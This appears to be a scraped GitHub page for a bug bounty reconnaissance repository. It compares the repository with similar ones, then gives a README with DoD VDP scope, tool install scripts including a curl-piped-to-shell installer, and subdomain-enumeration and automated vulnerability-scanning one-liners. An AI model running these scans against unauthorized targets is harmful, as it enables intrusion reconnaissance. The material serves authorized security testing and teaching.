KingOfBugBountyTips

Our main goal is to share tips from some well-known bug hunters. Using recon methodology, we are able to find subdomains, APIs, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.

Top Related Projects

A list of resources for those interested in getting started in bug bounties

A list of interesting payloads, tips and tricks for bug bounty hunters.

Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-ups that is categorized by the bug nature

A curated list of bugbounty writeups (bug type wise), inspired from https://github.com/ngalongc/bug-bounty-reference

A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.

Community curated list of public bug bounty and responsible disclosure programs.

Quick Overview

KingOfBugBountyTips is a GitHub repository that serves as a comprehensive collection of tips, tools, and techniques for bug bounty hunters and security researchers. It provides a curated list of resources, methodologies, and best practices to help improve the effectiveness of bug hunting and vulnerability discovery.

Pros

  • Extensive collection of tools and techniques for various aspects of bug bounty hunting
  • Regularly updated with new content and community contributions
  • Well-organized structure, making it easy to find specific information
  • Includes both basic and advanced techniques, suitable for beginners and experienced hunters

Cons

  • Some tools and techniques may become outdated over time
  • Lacks detailed explanations or tutorials for each tool or technique
  • May overwhelm beginners due to the sheer volume of information
  • Some links may lead to external resources that are no longer available

Getting Started

To get started with KingOfBugBountyTips:

  1. Visit the GitHub repository: https://github.com/KingOfBugbounty/KingOfBugBountyTips
  2. Browse through the README.md file to get an overview of the available content
  3. Explore specific sections that interest you, such as recon techniques, subdomain enumeration, or vulnerability scanners
  4. Follow the links provided to learn more about individual tools or techniques
  5. Consider starring the repository to stay updated with new additions and changes

Note: This is not a code library, so there are no code examples or installation instructions. The repository primarily serves as a reference and resource collection for bug bounty hunters.

Competitor Comparisons

A list of resources for those interested in getting started in bug bounties

Pros of Resources-for-Beginner-Bug-Bounty-Hunters

  • More structured and organized content, with clear categories for different learning areas
  • Includes a wider range of resources, including articles, videos, and tools
  • Regularly updated with new content and contributions from the community

Cons of Resources-for-Beginner-Bug-Bounty-Hunters

  • Less focused on specific techniques and tools compared to KingOfBugBountyTips
  • May be overwhelming for absolute beginners due to the large amount of information

Code Comparison

While both repositories primarily focus on providing resources rather than code, KingOfBugBountyTips does include some command-line examples:

KingOfBugBountyTips:

echo "domain" | subfinder -silent | httpx -silent | nuclei -t nuclei-templates -o result

Resources-for-Beginner-Bug-Bounty-Hunters doesn't typically include code snippets, focusing instead on curating external resources.

Summary

Both repositories offer valuable resources for bug bounty hunters. KingOfBugBountyTips provides more specific techniques and tools, while Resources-for-Beginner-Bug-Bounty-Hunters offers a broader, more structured approach to learning. The choice between them depends on the user's experience level and learning style.

A list of interesting payloads, tips and tricks for bug bounty hunters.

Pros of bugbounty-cheatsheet

  • More structured and organized content, with clear categories and subcategories
  • Includes detailed explanations and examples for various vulnerability types
  • Regularly updated with contributions from the community

Cons of bugbounty-cheatsheet

  • Less focus on specific tools and automation techniques
  • May be overwhelming for beginners due to the extensive amount of information
  • Lacks real-world examples or case studies

Code Comparison

bugbounty-cheatsheet:

# Example of a subdomain takeover using Surge.sh
surge --domain <subdomain>.<target>.com

KingOfBugBountyTips:

# Subdomain enumeration using Subfinder and httpx
subfinder -d $1 | httpx -silent | anew

Both repositories provide valuable resources for bug bounty hunters, but they differ in their approach. bugbounty-cheatsheet offers a comprehensive guide with detailed explanations, while KingOfBugBountyTips focuses on practical tips and tools for automation. The choice between the two depends on the user's experience level and specific needs in their bug bounty journey.

Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-ups that is categorized by the bug nature

Pros of bug-bounty-reference

  • More comprehensive and structured organization of resources
  • Includes a wider range of topics and vulnerability types
  • Regularly updated with new content and resources

Cons of bug-bounty-reference

  • Less focus on specific tools and techniques
  • May be overwhelming for beginners due to the large amount of information
  • Lacks the concise, tip-based format of KingOfBugBountyTips

Code comparison

While both repositories primarily consist of markdown files and don't contain much actual code, KingOfBugBountyTips does include some command-line examples:

KingOfBugBountyTips:

echo "domain" | subfinder -silent | httpx -silent | nuclei -t nuclei-templates -o result

bug-bounty-reference doesn't typically include command-line examples, focusing more on explanations and links to resources.

Summary

bug-bounty-reference offers a more comprehensive and structured approach to bug bounty resources, making it ideal for researchers looking for in-depth information on various vulnerability types. However, it may be less accessible for beginners and lacks the quick-tip format of KingOfBugBountyTips. The latter is more focused on practical tools and techniques, making it better suited for those looking for immediate, actionable tips.

A curated list of bugbounty writeups (bug type wise), inspired from https://github.com/ngalongc/bug-bounty-reference

Pros of Awesome-Bugbounty-Writeups

  • Well-organized structure with categories for different vulnerability types
  • Includes a wide range of detailed writeups from various sources
  • Regularly updated with new content and contributions

Cons of Awesome-Bugbounty-Writeups

  • Focuses primarily on writeups, lacking practical tools and commands
  • May be overwhelming for beginners due to the large volume of content
  • Less emphasis on quick tips and one-liners for bug hunting

Code Comparison

KingOfBugBountyTips often includes practical command-line examples:

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Awesome-Bugbounty-Writeups typically doesn't include code snippets, instead focusing on explanatory content:

## SQL Injection
- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
- [SQL Injection Payload List](https://github.com/payloadbox/sql-injection-payload-list)

Summary

KingOfBugBountyTips is more focused on practical tips, tools, and commands for bug bounty hunters, while Awesome-Bugbounty-Writeups provides a comprehensive collection of detailed writeups and explanations. The former is better for quick reference and hands-on techniques, while the latter offers in-depth understanding of various vulnerabilities and exploitation methods.

A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.

Pros of awesome-bug-bounty

  • More comprehensive and structured organization of resources
  • Includes a wider range of categories, such as tools, platforms, and educational materials
  • Regularly updated with new content and contributions from the community

Cons of awesome-bug-bounty

  • Less focus on specific techniques and tips for bug hunting
  • May be overwhelming for beginners due to the large amount of information
  • Lacks the concise, practical approach found in KingOfBugBountyTips

Code comparison

While both repositories primarily consist of curated lists and resources rather than actual code, KingOfBugBountyTips occasionally includes command-line examples:

KingOfBugBountyTips:

echo "domain" | waybackurls | grep -E "\.js(onp?)?$" | xargs -n1 -I{} sh -c 'echo {}; curl -sk {} | grep -oP "(?<=(\"|'\''))\/[a-zA-Z0-9_\-]+"'

awesome-bug-bounty does not typically include code snippets, focusing instead on linking to external resources and tools.

Both repositories serve as valuable resources for bug bounty hunters, with KingOfBugBountyTips offering more practical tips and techniques, while awesome-bug-bounty provides a comprehensive collection of resources and tools for the bug bounty community.

Community curated list of public bug bounty and responsible disclosure programs.

Pros of public-bugbounty-programs

  • Provides a comprehensive, structured list of public bug bounty programs
  • Regularly updated with new programs and changes
  • Includes additional metadata like program URLs and platform information

Cons of public-bugbounty-programs

  • Focuses solely on program listings, lacking specific tips or techniques
  • May not be as beginner-friendly for those new to bug bounty hunting
  • Less community-driven content compared to KingOfBugBountyTips

Code Comparison

public-bugbounty-programs:

- name: HackerOne
  url: https://hackerone.com/security
  bounty: true
  domains:
    - hackerone.com

KingOfBugBountyTips:

echo "example.com" | waybackurls | grep -E "\.js(onp?)?$" | anew | getjs

The code snippets highlight the different focus of each repository. public-bugbounty-programs uses YAML to structure program information, while KingOfBugBountyTips provides command-line tips for bug hunting techniques.

Both repositories serve valuable purposes in the bug bounty community. public-bugbounty-programs offers a centralized resource for finding active programs, while KingOfBugBountyTips provides practical tips and tools for conducting bug bounty hunts. The choice between them depends on whether you're looking for program listings or hunting techniques.

README

KingOfBugBountyTips

Tactical Recon

The Ultimate Bug Bounty Reconnaissance Arsenal

"In the shadows we hunt, in the code we trust"


DoD VDP Scope

DoD Vulnerability Disclosure Program | KingRecon DOD

Full DoD Scope - 19 Domains
# BBRF Scope - All DoD Domains
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'
Military Branches
  • *.af.mil - Air Force
  • *.army.mil - Army
  • *.marines.mil - Marines
  • *.navy.mil - Navy
  • *.spaceforce.mil - Space Force
  • *.ussf.mil - Space Force

DoD Agencies
  • *.pentagon.mil - Pentagon HQ
  • *.osd.mil - Office of SecDef
  • *.disa.mil - Defense Info Systems
  • *.dtra.mil - Threat Reduction
  • *.dla.mil - Logistics Agency
  • *.dcma.mil - Contract Management

Support Commands
  • *.dtic.mil - Tech Info Center
  • *.dau.mil - Acquisition Univ
  • *.health.mil - Military Health
  • *.ng.mil - National Guard
  • *.uscg.mil - Coast Guard
  • *.socom.mil - Special Operations

Security Notice

This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.

✅ Permitted Use Cases

  • ✅ Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
  • ✅ Authorized Penetration Testing - With written permission
  • ✅ Personal Lab Environments - Your own infrastructure
  • ✅ Educational Purposes - Learning and research
  • ✅ DoD VDP Program - Following program rules

❌ Prohibited Activities

  • ❌ Unauthorized Testing - Testing without explicit permission
  • ❌ Malicious Intent - Using techniques for harm or theft
  • ❌ Out-of-Scope Testing - Testing targets outside program scope
  • ❌ Social Engineering - Unless explicitly allowed in program
  • ❌ DoS/DDoS Attacks - Resource exhaustion attacks

📋 Responsible Disclosure Guidelines

  1. Read the Program Policy - Always review scope and rules
  2. Test Safely - Don't cause harm to production systems
  3. Document Everything - Keep detailed notes of your findings
  4. Report Privately - Use official channels for disclosure
  5. Give Time to Fix - Allow vendors reasonable time to patch
  6. Be Professional - Maintain ethical standards

🔒 Report Security Issues

Found a security issue in this repository? Please report it responsibly:

Report Issue


📚 Table of Contents

  • About: Project overview and goals
  • Quick Start: Get started in 5 minutes
  • Required Tools: Essential toolset
  • BBRF Scope DoD: DoD scope configuration
  • Subdomain Enumeration: Finding subdomains
  • JavaScript Recon: JS file analysis
  • XSS Detection: Cross-site scripting
  • SQL Injection: SQLi techniques
  • SSRF & SSTI: Server-side attacks
  • Web Crawling: Deep crawling methods
  • Parameter Discovery: Hidden params
  • Content Discovery: Sensitive files
  • Nuclei Scanning: Automated scanning
  • API Security Testing: API vulnerabilities
  • Cloud Security: AWS, GCP, Azure
  • Automation Scripts: Ready-to-use scripts
  • Bash Functions: Shell productivity
  • New Oneliners 2026: CVE-2026 exploits & techniques
  • Oneliners 2024-2025: Previous techniques
  • Search Engines: Hacker search engines
  • Wordlists: Best wordlists
  • Resources: Books, courses, blogs

🎯 About

╔═══════════════════════════════════════════════════════════════╗
║                 🎯 MISSION STATEMENT 🎯                       ║
╠═══════════════════════════════════════════════════════════════╣
║  Share elite bug bounty techniques from world-class hunters   ║
║  Build the most comprehensive one-liner collection           ║
║  Empower the security research community                     ║
╚═══════════════════════════════════════════════════════════════╝

Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and vulnerabilities that are exploitable. We aim to influence and educate the community with powerful one-liner techniques for better understanding and faster results.

🏆 What Makes This Repository Special?

  • 💎 Curated Commands - Battle-tested from real hunters
  • 🎯 Full Methodology - Recon to exploitation
  • 🔄 Constantly Updated - New techniques weekly
  • 🌍 Community Driven - Top hunters worldwide

📦 Special Resources

BugBuntu KingRecon Contribute

📊 Repository Highlights

  • One-Liners: 400+ (✅ Active)
  • Techniques: 50+ (✅ Active)
  • Tools Covered: 100+ (✅ Active)
  • CVE Examples: 20+ (✅ Active)
  • DoD Domains: 19 (✅ Active)
  • Contributors: Growing (🚀 Growing)
  • Last Update: 2026 (✅ Current)

🚀 Quick Start

⚡ Get your first recon running in under 5 minutes

1️⃣ Install Tools → 2️⃣ Run Recon → 3️⃣ Find Bugs

# 📥 Step 1: Install essential tools (ProjectDiscovery Suite)
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# 🔍 Step 2: Run your first reconnaissance chain
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# 🎉 Step 3: Analyze results and profit!
# Check the output for vulnerabilities and start reporting!

# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

🎯 Pro Tips for Beginners

  • 🔑 Always get proper authorization before testing
  • 📝 Keep detailed notes of your findings
  • 🛠️ Start with automated tools, then manual testing
  • 💰 Focus on high-impact vulnerabilities first
  • 🤝 Join the community and learn from others

🛠️ Required Tools

Core Tools

Category | Tools | Installation
Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest
Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest
URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest
Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest
SQLi | SQLMap, Ghauri | pip install sqlmap ghauri
Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest
Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest
JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest
Cert Monitoring | Certstream, Certstream-go | pip install certstream
DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest
API Discovery | Arjun, x8, ParamSpider | pip install arjun
Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest
Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli
OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys
Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest
Scope Management | BBRF | pip install bbrf

System Dependencies

# Ubuntu/Debian
sudo apt update && sudo apt install -y \
    jq \
    curl \
    wget \
    git \
    python3 \
    python3-pip \
    golang-go \
    nmap \
    masscan \
    chromium-browser \
    parallel \
    whois \
    dnsutils \
    libpcap-dev \
    build-essential

# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

Go Environment Setup

# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Quick Install Script - Go Tools

#!/bin/bash
# One-click install for all Go tools

echo "[*] Installing Go tools..."
go_tools=(
    # ProjectDiscovery
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
    "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
    "github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
    # Tomnomnom
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/tomnomnom/assetfinder@latest"
    "github.com/tomnomnom/httprobe@latest"
    # Fuzzing & Crawling
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
    "github.com/hakluke/hakrevdns@latest"
    # Security
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/lc/subjs@latest"
    # Screenshots & Utils
    "github.com/sensepost/gowitness@latest"
    "github.com/d3mondev/puredns/v2@latest"
    "github.com/j3ssie/metabigor@latest"
    "github.com/Emoe/kxss@latest"
    "github.com/ferreiraklet/airixss@latest"
    "github.com/edoardottt/cariddi/cmd/cariddi@latest"
    "github.com/trufflesecurity/trufflehog/v3@latest"
)

for tool in "${go_tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool" 2>/dev/null
done

echo "[✓] Go tools installed!"

Quick Install Script - Python Tools

#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Quick Install Script - Rust Tools (Feroxbuster)

#!/bin/bash
# Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

# Install Rust if not present
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi

# Install Feroxbuster
cargo install feroxbuster

echo "[✓] Rust tools installed!"

Quick Install Script - External Tools

#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Master Install Script (All-in-One)

#!/bin/bash
# MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗"
echo "║     KingOfBugBounty - Complete Tool Installation         ║"
echo "╚══════════════════════════════════════════════════════════╝"

# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc

# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi
cargo install feroxbuster

# Update Nuclei templates
nuclei -update-templates

echo ""
echo "╔══════════════════════════════════════════════════════════╗"
echo "║            ✓ Installation Complete!                      ║"
echo "╚══════════════════════════════════════════════════════════╝"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"

Wordlists Installation

#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Verify Installation

#!/bin/bash
# Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do
    if command -v $tool &> /dev/null; then
        echo "[✓] $tool"
    else
        echo "[✗] $tool - NOT FOUND"
    fi
done

🎯 BBRF Scope DoD

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Subdomain Enumeration ☠️

███████╗██╗   ██╗██████╗ ██████╗  ██████╗ ███╗   ███╗ █████╗ ██╗███╗   ██╗
██╔════╝██║   ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗  ██║
███████╗██║   ██║██████╔╝██║  ██║██║   ██║██╔████╔██║███████║██║██╔██╗ ██║
╚════██║██║   ██║██╔══██╗██║  ██║██║   ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║
███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║  ██║██║██║ ╚████║
╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝  ╚═════╝ ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝

☠️ ENUMERATE EVERYTHING ☠️

💀 Multi-Source Discovery (All-in-One)

# ☠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

💀 Certificate Transparency Logs

# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Real-Time Monitoring - Basic

# ☠️ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

💀 Certstream with Domain Filter

# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream to Subdomain Discovery

# ☠️ Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

💀 Certstream + httpx Live Pipeline

# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Certstream Phishing Detection

# ☠️ Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

💀 Certstream with Nuclei Auto-Scan

# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Certstream Mass Collector Script

# ☠️ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

💀 Certstream Wildcard Certificate Hunter

# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Certstream + Shodan Enrichment

# ☠️ Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

💀 Certstream JSON Logger with Timestamp

# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Bug Bounty Scope Monitor

# ☠️ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

💀 Shodan + Nuclei Pipeline

# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 ASN Discovery & Reverse DNS

# ☠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

💀 DNS Bruteforce with Shuffledns

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Recursive Subdomain Enum

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

💀 Passive DNS - Multiple Sources

# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 GitHub Subdomain Scraping

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

💀 Censys Subdomain Discovery

# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API

# ☠️ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

💀 Wayback Machine Subdomains

# ☠️ Extract subdomains from Wayback Machine
